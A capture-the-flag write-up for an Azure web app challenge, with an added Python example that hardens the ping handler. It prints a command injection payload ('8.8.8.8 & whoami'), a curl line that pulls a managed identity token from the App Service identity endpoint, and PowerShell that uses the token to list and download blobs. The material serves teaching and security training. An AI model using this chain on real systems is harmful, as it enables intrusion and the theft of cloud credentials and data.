Kabinet's GitBook
Managed Secrets


Difficulty: Medium
Points: 500
Solves: 3

Description

Today in school, I learnt how to create a website with Python! There was also the networking lesson where I learnt the ping command...

P.S. The flag is not in the instance :)

Hints: Are there any internal services/endpoints running by default?

Visiting the site shows an Azure Web App Service running.

The web app sends a ping to whatever IP address or URL you give it. This is a classic command injection challenge, and we are able to easily get code execution:

8.8.8.8 & whoami
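
An added example, not from the original writeup or the challenge's source code: the ping handler's command construction in Python, with the injectable form beside a hardened one. The function names, the `ping -c 1` arguments, and accepting hostnames rather than full URLs are assumptions.

```python
import ipaddress
import re
import subprocess

# Characters that can appear in an IP literal or hostname; nothing a shell treats specially.
_ALLOWED = re.compile(r"[A-Za-z0-9.:-]{1,253}")
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def vulnerable_command(target: str) -> str:
    """The 'before' (hypothetical): input concatenated into a shell command line."""
    return "ping -c 1 " + target  # with shell=True, '&', ';' and '$VAR' are interpreted


def build_ping_argv(target: str) -> list[str]:
    """The 'after': validate the target and return an argv list for use without a shell."""
    target = target.strip()
    if not _ALLOWED.fullmatch(target):
        raise ValueError("target contains characters not valid in an IP or hostname")
    try:
        ipaddress.ip_address(target)  # IPv4 or IPv6 literal
    except ValueError:
        if not _HOSTNAME.fullmatch(target):  # labels cannot start with '-'
            raise ValueError("target is not an IP address or hostname") from None
    # '--' ends option parsing; '-c 1' assumes Linux iputils ping.
    return ["ping", "-c", "1", "--", target]


def safe_ping(target: str) -> subprocess.CompletedProcess:
    # A list with shell=False passes the target as one argv element.
    # The minimal env keeps IDENTITY_ENDPOINT / IDENTITY_HEADER out of the child.
    return subprocess.run(
        build_ping_argv(target),
        env={"PATH": "/usr/bin:/bin"},
        capture_output=True, text=True, timeout=5, check=False,
    )


if __name__ == "__main__":
    # Constructed inputs; the second is the payload shown in the writeup.
    for t in ["8.8.8.8", "8.8.8.8 & whoami"]:
        try:
            print(t, "->", build_ping_argv(t))
        except ValueError as exc:
            print(t, "-> rejected:", exc)
```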

Since I now have code execution, I can get the App Service to send a request to the IMDS (the managed identity endpoint exposed through $IDENTITY_ENDPOINT) to retrieve a management token, following the HackTricks reference.

8.8.8.8 & curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
{"access_token":"<access token omitted>","expires_on":"04/16/2023 22:34:06 +00:00","resource":"https://management.azure.com/","token_type":"Bearer","client_id":"982d1ca9-81ee-450e-8953-0f1a27129eb2"}

I am able to authenticate using the access token and client ID values.

# Values taken from the managed identity token response
$token = "<access_token value from the response>"
$id = "982d1ca9-81ee-450e-8953-0f1a27129eb2"

# Sign in to Azure PowerShell with the bearer token
Connect-AzAccount -AccessToken $token -AccountId $id

Next, I enumerate the resources that this service principal has access to.

I am then able to retrieve the flag from the storage account.

# Resource group and storage account the identity can reach
$rg="lncctf2023_managed_secrets"
$saname="lncctf2023managedsa"
$sa = Get-AzStorageAccount -ResourceGroupName $rg -StorageAccountName $saname
$ctx = $sa.Context

# List containers and blobs, then download the flag
Get-AzStorageContainer -Context $ctx
Get-AzStorageBlob -Context $ctx -Container private
Get-AzStorageBlobContent -Blob flag.txt -Container private -Destination flag.txt -Context $ctx

Flag: LNC2023{h3y_h0w_did_y0u_g3T_thi5}

Links
https://lncctf2023-webapp.azurewebsites.net (Web App Service | Microsoft Azure)
Cloud SSRF (HackTricks)